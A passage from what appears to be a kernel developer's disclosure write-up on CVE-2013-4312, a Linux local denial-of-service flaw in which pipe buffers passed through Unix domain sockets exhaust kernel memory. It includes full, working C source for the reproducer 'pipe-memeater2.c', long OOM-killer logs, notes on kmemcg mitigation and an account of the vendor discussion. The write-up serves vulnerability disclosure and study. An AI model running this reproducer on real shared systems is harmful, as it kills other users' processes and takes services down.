[  117.086761]  [<ffffffff8110056b>] __do_page_cache_readahead+0xdb/0x210
[  117.088509]  [<ffffffff811006c1>] ra_submit+0x21/0x30
[  117.089867]  [<ffffffff810f7eb0>] filemap_fault+0x400/0x450
[  117.091370]  [<ffffffff81111c34>] __do_fault+0x54/0x550
[  117.092783]  [<ffffffff811148f5>] handle_mm_fault+0x1c5/0xce0
[  117.094331]  [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230
[  117.095809]  [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230
[  117.097269]  [<ffffffff8148817c>] do_page_fault+0x11c/0x320
[  117.098771]  [<ffffffff81484e35>] page_fault+0x25/0x30
[  117.100186] Mem-Info:
[  117.100828] Node 0 DMA per-cpu:
[  117.101721] CPU    0: hi:    0, btch:   1 usd:   0
[  117.103026] CPU    1: hi:    0, btch:   1 usd:   0
[  117.104324] CPU    2: hi:    0, btch:   1 usd:   0
[  117.105638] CPU    3: hi:    0, btch:   1 usd:   0
[  117.106938] Node 0 DMA32 per-cpu:
[  117.107901] CPU    0: hi:  186, btch:  31 usd:   0
[  117.109194] CPU    1: hi:  186, btch:  31 usd:   0
[  117.110416] CPU    2: hi:  186, btch:  31 usd:  60
[  117.111349] CPU    3: hi:  186, btch:  31 usd:   0
[  117.112250] active_anon:108 inactive_anon:943 isolated_anon:0
[  117.112250]  active_file:12 inactive_file:26 isolated_file:0
[  117.112251]  unevictable:0 dirty:0 writeback:0 unstable:0
[  117.112251]  free:3440 slab_reclaimable:3789 slab_unreclaimable:22390
[  117.112252]  mapped:0 shmem:73 pagetables:199 bounce:0
[  117.117807] Node 0 DMA free:8064kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:24kB slab_unreclaimable:1044kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  117.124393] lowmem_reserve[]: 0 2004 2004 2004
[  117.125326] Node 0 DMA32 free:5696kB min:5708kB low:7132kB high:8560kB active_anon:432kB inactive_anon:3772kB active_file:48kB inactive_file:104kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:292kB slab_reclaimable:15132kB slab_unreclaimable:88516kB kernel_stack:1048kB pagetables:796kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:320 all_unreclaimable? yes
[  117.132331] lowmem_reserve[]: 0 0 0 0
[  117.133309] Node 0 DMA: 0*4kB 76*8kB 0*16kB 1*32kB 2*64kB 1*128kB 2*256kB 1*512kB 2*1024kB 2*2048kB 0*4096kB = 8064kB
[  117.135516] Node 0 DMA32: 699*4kB 1*8kB 6*16kB 2*32kB 2*64kB 1*128kB 0*256kB 1*512kB 0*1024kB 1*2048kB 0*4096kB = 5780kB
[  117.137807] 112 total pagecache pages
[  117.138501] 0 pages in swap cache
[  117.139134] Swap cache stats: add 0, delete 0, find 0/0
[  117.140090] Free swap  = 0kB
[  117.140602] Total swap = 0kB
[  117.143667] 524272 pages RAM
[  117.144630] 13239 pages reserved
[  117.145267] 275 pages shared
[  117.145895] 489349 pages non-shared
[  117.146529] [ pid ]   uid  tgid total_vm      rss cpu oom_adj name
[  117.147662] [    1]     0     1     4850       75   0       0 init
[  117.148883] [  423]     0   423     2767      200   0     -17 udevd
[  117.150166] [ 1086]     0  1086     2292      122   1       0 dhclient
[  117.151359] [ 1142]     0  1142     6399       59   0     -17 auditd
[  117.152556] [ 1285]     0  1285     5639       46   1       0 hald-addon-rfki
[  117.153910] [ 1293]     0  1293     5641       47   1       0 hald-addon-inpu
[  117.155214] [ 1317]     0  1317    16570      177   2     -17 sshd
[  117.156409] [ 1426]     0  1426     1028       21   2       0 mingetty
[  117.157610] [ 1428]     0  1428     1028       21   3       0 mingetty
[  117.158821] [ 1430]     0  1430     1032       21   0       0 agetty
[  117.160054] [ 1431]     0  1431     1028       21   1       0 mingetty
[  117.161282] [ 1433]     0  1433     1028       20   1       0 mingetty
[  117.162468] [ 1435]     0  1435     1028       21   2       0 mingetty
[  117.163692] [ 1437]     0  1437     2683      116   3     -17 udevd
[  117.164843] [ 1438]     0  1438     2683      116   2     -17 udevd
[  117.166093] [ 1694]   500  1694      993       19   2       0 pipe-memeater
[  117.167424] [ 1695]   500  1695      993       19   2       0 pipe-memeater
[  117.168767] [ 1697]     0  1697     1028       20   3       0 mingetty
[  117.170007] Out of memory: kill process 1694 (pipe-memeater) score 993 or a child
[  117.171449] Killed process 1694 (pipe-memeater) vsz:3972kB, anon-rss:76kB, file-rss:0kB
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-agetty(1430)
        |-auditd(1142)---{auditd}(1143)
        |-dhclient(1086)
        |-hald-addon-inpu(1293)
        |-hald-addon-rfki(1285)
        |-mingetty(1426)
        |-mingetty(1428)
        |-mingetty(1431)
        |-mingetty(1433)
        |-mingetty(1435)
        |-mingetty(1697)
        |-pipe-memeater(1695)
        |-sshd(1317)---sshd(1770)---sshd(1772)---bash(1773)---pstree(1790)
        `-udevd(423)-+-udevd(1437)
                     `-udevd(1438)
[kumaneko@localhost ~]$
---------- Example output end ----------

Therefore, CVE-2013-4312 was assigned to this vulnerability.


2.2 How widely does this vulnerability affect?

"Well, there was a function in TOMOYO 1.7's userspace tools which passes file descriptors using Unix domain socket. Then, if I use Unix domain socket, I feel that I can assign all memory for pipe's buffer by assigning all file descriptors for pipe using only 1 process."

Experiment: What will happen if all file descriptors are filled with pipes?

---------- pipe-memeater2.c ----------
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#define F_SETPIPE_SZ (1024 + 7)

static int send_fd(int socket_fd, int fd) {
        struct msghdr msg = { };
        struct iovec iov = { "", 1 };
        char cmsg_buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr *cmsg = (struct cmsghdr *) cmsg_buf;
        msg.msg_iov = &iov;
        msg.msg_iovlen = 1;
        msg.msg_control = cmsg_buf;
        msg.msg_controllen = sizeof(cmsg_buf);
        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;
        cmsg->cmsg_len = CMSG_LEN(sizeof(int));
        msg.msg_controllen = cmsg->cmsg_len;
        memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
        return sendmsg(socket_fd, &msg, MSG_DONTWAIT);
}

int main(int argc, char *argv[])
{
        int fd;
        int socket_fd[2] = { EOF, EOF };
        for (fd = 0; fd < 1024; fd++)
                close(fd);
        for (fd = 0; fd < 10; fd++)
                if (fork() == 0) {
                        fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1", 1);
                        close(fd);
                        while (1)
                                sleep(1);
                }
        if (fork() || fork() || setsid() == EOF)
                _exit(0);
        if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd))
                _exit(0);
        fd = socket_fd[1];
        while (1) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd) ||
                        send_fd(fd, socket_fd[0]) == EOF)
                        break;
                while (1) {
                        static char buf[4096];
                        int ret;
                        int pipe_fd[2] = { EOF, EOF };
                        if (pipe(pipe_fd))
                                break;
                        ret = send_fd(fd, pipe_fd[0]);
                        if (argc == 1) {
                                fcntl(pipe_fd[1], F_SETPIPE_SZ, 1048576);
                                fcntl(pipe_fd[1], F_SETFL, O_NONBLOCK | fcntl(pipe_fd[1], F_GETFL));
                                while (write(pipe_fd[1], buf, sizeof(buf)) == sizeof(buf));
                        }
                        close(pipe_fd[1]);
                        close(pipe_fd[0]);
                        if (ret == EOF)
                                break;
                }
                close(socket_fd[0]);
                close(fd);
                fd = socket_fd[1];
        }
        if (argc != 1)
                while (1)
                        sleep(1);
        _exit(0);
}
---------- pipe-memeater2.c ----------

Result: As expected, almost all processes are killed OOM killer.

---------- Example output start ----------
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-NetworkManager(1271)
        |-agetty(1502)
        |-auditd(1207)---{auditd}(1208)
        |-bonobo-activati(1699)---{bonobo-activat}(1700)
        |-console-kit-dae(1510)-+-{console-kit-da}(1511)
        |                       |-{console-kit-da}(1512)
        |                       |-{console-kit-da}(1513)
        |                       |-{console-kit-da}(1514)
        |                       |-{console-kit-da}(1515)
        |                       |-{console-kit-da}(1516)
        |                       |-{console-kit-da}(1517)
        |                       |-{console-kit-da}(1518)
        |                       |-{console-kit-da}(1519)
        |                       |-{console-kit-da}(1520)
        |                       |-{console-kit-da}(1521)
        |                       |-{console-kit-da}(1522)
        |                       |-{console-kit-da}(1523)
        |                       |-{console-kit-da}(1524)
        |                       |-{console-kit-da}(1525)
        |                       |-{console-kit-da}(1526)
        |                       |-{console-kit-da}(1527)
        |                       |-{console-kit-da}(1528)
        |                       |-{console-kit-da}(1529)
        |                       |-{console-kit-da}(1530)
        |                       |-{console-kit-da}(1531)
        |                       |-{console-kit-da}(1532)
        |                       |-{console-kit-da}(1533)
        |                       |-{console-kit-da}(1534)
        |                       |-{console-kit-da}(1535)
        |                       |-{console-kit-da}(1536)
        |                       |-{console-kit-da}(1537)
        |                       |-{console-kit-da}(1538)
        |                       |-{console-kit-da}(1539)
        |                       |-{console-kit-da}(1540)
        |                       |-{console-kit-da}(1541)
        |                       |-{console-kit-da}(1542)
        |                       |-{console-kit-da}(1543)
        |                       |-{console-kit-da}(1544)
        |                       |-{console-kit-da}(1545)
        |                       |-{console-kit-da}(1546)
        |                       |-{console-kit-da}(1547)
        |                       |-{console-kit-da}(1548)
        |                       |-{console-kit-da}(1549)
        |                       |-{console-kit-da}(1550)
        |                       |-{console-kit-da}(1551)
        |                       |-{console-kit-da}(1552)
        |                       |-{console-kit-da}(1553)
        |                       |-{console-kit-da}(1554)
        |                       |-{console-kit-da}(1555)
        |                       |-{console-kit-da}(1556)
        |                       |-{console-kit-da}(1557)
        |                       |-{console-kit-da}(1558)
        |                       |-{console-kit-da}(1559)
        |                       |-{console-kit-da}(1560)
        |                       |-{console-kit-da}(1561)
        |                       |-{console-kit-da}(1562)
        |                       |-{console-kit-da}(1563)
        |                       |-{console-kit-da}(1564)
        |                       |-{console-kit-da}(1565)
        |                       |-{console-kit-da}(1566)
        |                       |-{console-kit-da}(1567)
        |                       |-{console-kit-da}(1568)
        |                       |-{console-kit-da}(1569)
        |                       |-{console-kit-da}(1570)
        |                       |-{console-kit-da}(1571)
        |                       |-{console-kit-da}(1572)
        |                       `-{console-kit-da}(1574)
        |-crond(1476)
        |-dbus-daemon(1670)
        |-dbus-daemon(1258)
        |-dbus-launch(1669)
        |-devkit-power-da(1674)
        |-dhclient(1151)
        |-gconfd-2(1680)
        |-gdm-binary(1636)-+-gdm-simple-slav(1649)-+-Xorg(1652)
        |                  |                       |-gdm-session-wor(1730)
        |                  |                       |-gnome-session(1671)-+-at-spi-registry(1694)
        |                  |                       |                     |-gdm-simple-gree(1710)
        |                  |                       |                     |-gnome-power-man(1711)
        |                  |                       |                     |-metacity(1707)
        |                  |                       |                     |-polkit-gnome-au(1709)
        |                  |                       |                     `-{gnome-session}(1695)
        |                  |                       `-{gdm-simple-sla}(1653)
        |                  `-{gdm-binary}(1650)
        |-gnome-settings-(1697)---{gnome-settings}(1702)
        |-gvfsd(1706)
        |-hald(1310)-+-hald-runner(1311)-+-hald-addon-acpi(1366)
        |            |                   |-hald-addon-inpu(1359)
        |            |                   `-hald-addon-rfki(1349)
        |            `-{hald}(1312)
        |-login(1492)---bash(1577)
        |-master(1464)-+-pickup(1481)
        |              `-qmgr(1482)
        |-mingetty(1494)
        |-mingetty(1496)
        |-mingetty(1498)
        |-mingetty(1500)
        |-mingetty(1503)
        |-modem-manager(1275)
        |-notification-da(1716)
        |-polkitd(1714)
        |-pulseaudio(1723)---{pulseaudio}(1729)
        |-rsyslogd(1229)-+-{rsyslogd}(1230)
        |                |-{rsyslogd}(1231)
        |                `-{rsyslogd}(1233)
        |-rtkit-daemon(1725)-+-{rtkit-daemon}(1726)
        |                    `-{rtkit-daemon}(1727)
        |-sshd(1385)---sshd(1733)---sshd(1735)---bash(1736)---pstree(1753)
        |-udevd(487)-+-udevd(1507)
        |            `-udevd(1508)
        `-wpa_supplicant(1350)
[kumaneko@localhost ~]$ ./pipe-memeater2
(Omitting re-login operation)
[kumaneko@localhost ~]$ dmesg
[  132.693170] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0, oom_score_adj=0
[  132.695011] pipe-memeater2 cpuset=/ mems_allowed=0
[  132.695984] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[  132.697532] Call Trace:
[  132.698055]  [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[  132.699429]  [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[  132.700575]  [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70
[  132.701822]  [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[  132.702877]  [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[  132.704026]  [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[  132.705082]  [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[  132.706243]  [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110
[  132.707432]  [<ffffffff8119d274>] ? pipe_write+0x3c4/0x6b0
[  132.708457]  [<ffffffff81191f0a>] ? do_sync_write+0xfa/0x140
[  132.709525]  [<ffffffff81177f49>] ? ____cache_alloc_node+0x99/0x160
[  132.710684]  [<ffffffff810a1820>] ? autoremove_wake_function+0x0/0x40
[  132.712004]  [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160
[  132.712954]  [<ffffffff81232026>] ? security_file_permission+0x16/0x20
[  132.714140]  [<ffffffff81192208>] ? vfs_write+0xb8/0x1a0
[  132.715225]  [<ffffffff811936f6>] ? fget_light_pos+0x16/0x50
[  132.716293]  [<ffffffff81192d41>] ? sys_write+0x51/0xb0
[  132.717298]  [<ffffffff810e8c2e>] ? __audit_syscall_exit+0x25e/0x290
[  132.718554]  [<ffffffff8100b0d2>] ? system_call_fastpath+0x16/0x1b
[  132.719749] Mem-Info:
[  132.720206] Node 0 DMA per-cpu:
[  132.720817] CPU    0: hi:    0, btch:   1 usd:   0
[  132.721771] CPU    1: hi:    0, btch:   1 usd:   0
[  132.722666] CPU    2: hi:    0, btch:   1 usd:   0
[  132.723666] CPU    3: hi:    0, btch:   1 usd:   0
[  132.724652] Node 0 DMA32 per-cpu:
[  132.725328] CPU    0: hi:  186, btch:  31 usd:   0
[  132.726211] CPU    1: hi:  186, btch:  31 usd:  36
[  132.727161] CPU    2: hi:  186, btch:  31 usd:   0
[  132.728076] CPU    3: hi:  186, btch:  31 usd:   3
[  132.728950] active_anon:14917 inactive_anon:249 isolated_anon:0
[  132.728951]  active_file:0 inactive_file:18 isolated_file:0
[  132.728951]  unevictable:0 dirty:8 writeback:0 unstable:0
[  132.728951]  free:13255 slab_reclaimable:7730 slab_unreclaimable:20346
[  132.728952]  mapped:281 shmem:306 pagetables:1876 bounce:0
[  132.734252] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:84kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  132.742139] lowmem_reserve[]: 0 2004 2004 2004
[  132.743187] Node 0 DMA32 free:44676kB min:44720kB low:55900kB high:67080kB active_anon:59668kB inactive_anon:996kB active_file:0kB inactive_file:72kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:32kB writeback:0kB mapped:1124kB shmem:1224kB slab_reclaimable:30836kB slab_unreclaimable:81132kB kernel_stack:4384kB pagetables:7504kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:191 all_unreclaimable? yes
[  132.750447] lowmem_reserve[]: 0 0 0 0
[  132.751251] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB
[  132.753469] Node 0 DMA32: 1595*4kB 865*8kB 431*16kB 241*32kB 130*64kB 34*128kB 2*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 44676kB
[  132.755994] 356 total pagecache pages
[  132.756679] 0 pages in swap cache
[  132.757295] Swap cache stats: add 0, delete 0, find 0/0
[  132.758283] Free swap  = 0kB
[  132.758803] Total swap = 0kB
[  132.761657] 524272 pages RAM
[  132.762296] 45689 pages reserved
[  132.762876] 1143 pages shared
[  132.763423] 459523 pages non-shared
[  132.764069] [ pid ]   uid  tgid total_vm      rss cpu oom_adj oom_score_adj name
[  132.765411] [  487]     0   487     2699      145   0     -17         -1000 udevd
[  132.766814] [ 1151]     0  1151     2280      123   1       0             0 dhclient
[  132.768201] [ 1207]     0  1207     6899       61   3     -17         -1000 auditd
[  132.769536] [ 1229]     0  1229    62271      648   3       0             0 rsyslogd
[  132.770997] [ 1258]    81  1258     5459      168   2       0             0 dbus-daemon
[  132.772434] [ 1271]     0  1271    20705      222   3       0             0 NetworkManager
[  132.773961] [ 1275]     0  1275    14530      124   3       0             0 modem-manager
[  132.775459] [ 1310]    68  1310     9588      292   3       0             0 hald
[  132.776834] [ 1311]     0  1311     5099       55   3       0             0 hald-runner
[  132.778298] [ 1349]     0  1349     5627       46   1       0             0 hald-addon-rfki
[  132.779789] [ 1350]     0  1350    11247      134   0       0             0 wpa_supplicant
[  132.781244] [ 1359]     0  1359     5629       46   3       0             0 hald-addon-inpu
[  132.782802] [ 1366]    68  1366     4501       41   1       0             0 hald-addon-acpi
[  132.784277] [ 1385]     0  1385    16558      177   0     -17         -1000 sshd
[  132.785665] [ 1464]     0  1464    20222      226   3       0             0 master
[  132.787005] [ 1476]     0  1476    29216      153   0       0             0 crond
[  132.788365] [ 1481]    89  1481    20242      218   2       0             0 pickup
[  132.789833] [ 1482]    89  1482    20259      219   0       0             0 qmgr
[  132.791187] [ 1492]     0  1492    17403      127   1       0             0 login
[  132.792555] [ 1494]     0  1494     1016       21   0       0             0 mingetty
[  132.794302] [ 1496]     0  1496     1016       21   0       0             0 mingetty
[  132.795719] [ 1498]     0  1498     1016       22   0       0             0 mingetty
[  132.797089] [ 1500]     0  1500     1016       22   0       0             0 mingetty
[  132.798541] [ 1502]     0  1502     1020       23   0       0             0 agetty
[  132.799880] [ 1503]     0  1503     1016       20   0       0             0 mingetty
[  132.801484] [ 1507]     0  1507     2698      144   2     -17         -1000 udevd
[  132.802964] [ 1508]     0  1508     2698      144   0     -17         -1000 udevd
[  132.804308] [ 1510]     0  1510   521256      341   3       0             0 console-kit-dae
[  132.805966] [ 1577]     0  1577    27076       95   2       0             0 bash
[  132.807295] [ 1636]     0  1636    33501       81   0       0             0 gdm-binary
[  132.808710] [ 1649]     0  1649    41156      153   3       0             0 gdm-simple-slav
[  132.810269] [ 1652]     0  1652    42840     4384   3       0             0 Xorg
[  132.811594] [ 1669]    42  1669     5009       66   2       0             0 dbus-launch
[  132.813061] [ 1670]    42  1670     5390       86   3       0             0 dbus-daemon
[  132.814495] [ 1671]    42  1671    67289      479   1       0             0 gnome-session
[  132.815956] [ 1674]     0  1674    12490      161   3       0             0 devkit-power-da
[  132.817561] [ 1680]    42  1680    33055      539   3       0             0 gconfd-2
[  132.819058] [ 1694]    42  1694    30175      292   0       0             0 at-spi-registry
[  132.820530] [ 1697]    42  1697    86838      958   1       0             0 gnome-settings-
[  132.822181] [ 1699]    42  1699    89636      197   1       0             0 bonobo-activati
[  132.823653] [ 1706]    42  1706    33819       82   1       0             0 gvfsd
[  132.825062] [ 1707]    42  1707    71453      682   1       0             0 metacity
[  132.826434] [ 1709]    42  1709    62076      443   0       0             0 polkit-gnome-au
[  132.827924] [ 1710]    42  1710    95132     1239   3       0             0 gdm-simple-gree
[  132.829457] [ 1711]    42  1711    68423      516   3       0             0 gnome-power-man
[  132.830948] [ 1714]     0  1714    13157      303   2       0             0 polkitd
[  132.832303] [ 1723]    42  1723    86434      201   2       0             0 pulseaudio
[  132.833781] [ 1725]   498  1725    42113       53   2       0             0 rtkit-daemon
[  132.835231] [ 1730]     0  1730    35441       95   3       0             0 gdm-session-wor
[  132.836776] [ 1733]     0  1733    25629      255   0       0             0 sshd
[  132.838102] [ 1735]   500  1735    25629      256   0       0             0 sshd
[  132.839429] [ 1736]   500  1736    27076       94   2       0             0 bash
[  132.840851] [ 1755]   500  1755      981       20   3       0             1 pipe-memeater2
[  132.842372] [ 1756]   500  1756      981       20   0       0             1 pipe-memeater2
[  132.843858] [ 1757]   500  1757      981       20   1       0             1 pipe-memeater2
[  132.845384] [ 1758]   500  1758      981       20   3       0             1 pipe-memeater2
[  132.846866] [ 1759]   500  1759      981       20   0       0             1 pipe-memeater2
[  132.848426] [ 1760]   500  1760      981       20   1       0             1 pipe-memeater2
[  132.850046] [ 1761]   500  1761      981       20   0       0             1 pipe-memeater2
[  132.851526] [ 1762]   500  1762      981       20   3       0             1 pipe-memeater2
[  132.853038] [ 1763]   500  1763      981       20   0       0             1 pipe-memeater2
[  132.854517] [ 1764]   500  1764      981       20   1       0             1 pipe-memeater2
[  132.856059] [ 1766]   500  1766      981       20   1       0             0 pipe-memeater2
[  132.857548] Out of memory: Kill process 1697 (gnome-settings-) score 2 or sacrifice child
[  132.859015] Killed process 1697, UID 42, (gnome-settings-) total-vm:347352kB, anon-rss:3252kB, file-rss:580kB
(Omitting repetitions)
[  137.704574] pipe-memeater2 invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0, oom_score_adj=0
[  137.707278] pipe-memeater2 cpuset=/ mems_allowed=0
[  137.708516] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[  137.710327] Call Trace:
[  137.711014]  [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[  137.712503]  [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[  137.713895]  [<ffffffff8153c797>] ? _spin_unlock_irqrestore+0x17/0x20
[  137.715475]  [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[  137.716797]  [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[  137.718171]  [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[  137.719466]  [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[  137.720710]  [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110
[  137.721864]  [<ffffffff81127d47>] ? __page_cache_alloc+0x87/0x90
[  137.723103]  [<ffffffff8112772e>] ? find_get_page+0x1e/0xa0
[  137.724195]  [<ffffffff81128ce7>] ? filemap_fault+0x1a7/0x500
[  137.725370]  [<ffffffff811522c4>] ? __do_fault+0x54/0x530
[  137.726422]  [<ffffffff8107ed47>] ? current_fs_time+0x27/0x30
[  137.727569]  [<ffffffff81152897>] ? handle_pte_fault+0xf7/0xb20
[  137.728774]  [<ffffffff8119d1da>] ? pipe_write+0x32a/0x6b0
[  137.730021]  [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0
[  137.731316]  [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500
[  137.732674]  [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160
[  137.733747]  [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0
[  137.735073]  [<ffffffff8153cc55>] ? page_fault+0x25/0x30
[  137.736314] Mem-Info:
[  137.737119] Node 0 DMA per-cpu:
[  137.738204] CPU    0: hi:    0, btch:   1 usd:   0
[  137.739307] CPU    1: hi:    0, btch:   1 usd:   0
[  137.740428] CPU    2: hi:    0, btch:   1 usd:   0
[  137.741553] CPU    3: hi:    0, btch:   1 usd:   0
[  137.742553] Node 0 DMA32 per-cpu:
[  137.743233] CPU    0: hi:  186, btch:  31 usd:   4
[  137.745237] CPU    1: hi:  186, btch:  31 usd:   0
[  137.746208] CPU    2: hi:  186, btch:  31 usd:   0
[  137.747148] CPU    3: hi:  186, btch:  31 usd:   0
[  137.748115] active_anon:634 inactive_anon:18 isolated_anon:0
[  137.748115]  active_file:0 inactive_file:96 isolated_file:0
[  137.748116]  unevictable:0 dirty:0 writeback:0 unstable:0
[  137.748116]  free:13318 slab_reclaimable:7641 slab_unreclaimable:20767
[  137.748117]  mapped:21 shmem:75 pagetables:118 bounce:0
[  137.753688] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:92kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  137.760653] lowmem_reserve[]: 0 2004 2004 2004
[  137.761734] Node 0 DMA32 free:44928kB min:44720kB low:55900kB high:67080kB active_anon:2536kB inactive_anon:72kB active_file:0kB inactive_file:384kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:84kB shmem:300kB slab_reclaimable:30472kB slab_unreclaimable:82816kB kernel_stack:2928kB pagetables:472kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  137.769505] lowmem_reserve[]: 0 0 0 0
[  137.770383] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB
[  137.772807] Node 0 DMA32: 810*4kB 612*8kB 293*16kB 185*32kB 99*64kB 50*128kB 15*256kB 9*512kB 3*1024kB 1*2048kB 0*4096kB = 45048kB
[  137.775481] 239 total pagecache pages
[  137.776214] 0 pages in swap cache
[  137.776877] Swap cache stats: add 0, delete 0, find 0/0
[  137.777916] Free swap  = 0kB
[  137.778504] Total swap = 0kB
[  137.781695] 524272 pages RAM
[  137.782347] 45689 pages reserved
[  137.783046] 314 pages shared
[  137.783631] 460183 pages non-shared
[  137.784339] [ pid ]   uid  tgid total_vm      rss cpu oom_adj oom_score_adj name
[  137.785819] [  487]     0   487     2699      145   0     -17         -1000 udevd
[  137.787313] [ 1207]     0  1207     6899       61   3     -17         -1000 auditd
[  137.788720] [ 1385]     0  1385    16558      177   0     -17         -1000 sshd
[  137.790073] [ 1507]     0  1507     2698      144   2     -17         -1000 udevd
[  137.791486] [ 1508]     0  1508     2698      144   0     -17         -1000 udevd
[  137.792912] [ 1766]   500  1766      981       20   3       0             0 pipe-memeater2
[  137.794509] Out of memory: Kill process 1766 (pipe-memeater2) score 1 or sacrifice child
[  137.796076] Killed process 1766, UID 500, (pipe-memeater2) total-vm:3924kB, anon-rss:80kB, file-rss:0kB
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-agetty(1777)
        |-auditd(1207)---{auditd}(1208)
        |-mingetty(1768)
        |-mingetty(1769)
        |-mingetty(1770)
        |-mingetty(1771)
        |-mingetty(1772)
        |-mingetty(1773)
        |-sshd(1385)---sshd(1856)---sshd(1858)---bash(1859)---pstree(1877)
        `-udevd(487)-+-udevd(1507)
                     `-udevd(1508)
[kumaneko@localhost ~]$
---------- Example output end ----------

This means that, this DoS attack succeeds on not only Linux 2.6.35 and later (which contains the patch in question) but also Linux 2.0 (which was released in July, 1996 and which supports passing file descriptors using Unix domain sockets).

  →All currently running Linux systems will be affected.


2.3 What is possible mitigation for this vulnerability?

If using Linux 3.8 and later (which supports kmemcg in memory cgroup functionality), it will be possible to restrict kernel memory usage such as pipe's buffer if kmemcg is configured appropriately.

But we cannot mitigate if Linux 3.7 and earlier (due to kmemcg not supported) or kmemcg is not configured.

  →How many of systems which allow execution of user defined programs configure kmemcg?


2.4 How did I try to handle this vulnerability?

Discussions went in a non-public mailing list for handling vulnerabilities ( security@kernel.org ). But this vulnerability was considered as "not worth addressing seriously".

·In the first place, allowing untrusted local users to login is the fault of administrators.

  →While you immediately address privilege escalation bug which can be exploited by local users, why you don't immediately address local DoS attack which can be exploited by local users?

·We can mitigate by configuring kmemcg (in memory cgroup) appropriately.

  →In the first place, can we configure kmemcg appropriately? Why you desert administrators using older kernels which does not support kmemcg?

·There are other ways for attacking.

  → Since I have experiences of access control modules such as CaitSith, I proposed an LSM module which restricts available file descriptors based on conditions like user ID and/or group ID. But that module was not accepted because it was judged as "a too grandiose change for addressing this problem".

Therefore, situation without any solutions lasted.


In the meanwhile, RHEL 7 beta was released in December 2013.

systemd was introduced, and many procedures such as starting/ending daemon processes were put under the control of systemd. Also, while the default filesystem for RHEL 6 was ext4, the default filesystem for RHEL 7 became xfs.

"I was able to terminate almost all daemon processes in RHEL6. Does the same thing happen in RHEL7?"

and I tried using RHEL 7 beta with GUI environment installed. However ···


something is wrong when running the reproducer program on RHEL 7 beta.

I was expecting that almost all processes are killed by OOM killer. But actually, the whole system sometimes freezes before or after OOM killer is invoked.

---------- Example output of a hang up before OOM killer is invoked start ----------
( I pressed SysRq-m in order to display memory information, for the system was not responding for 1 minute after pipe-memeater2 was started. )
[  143.112366] SysRq : Show Memory
[  143.114964] Mem-Info:
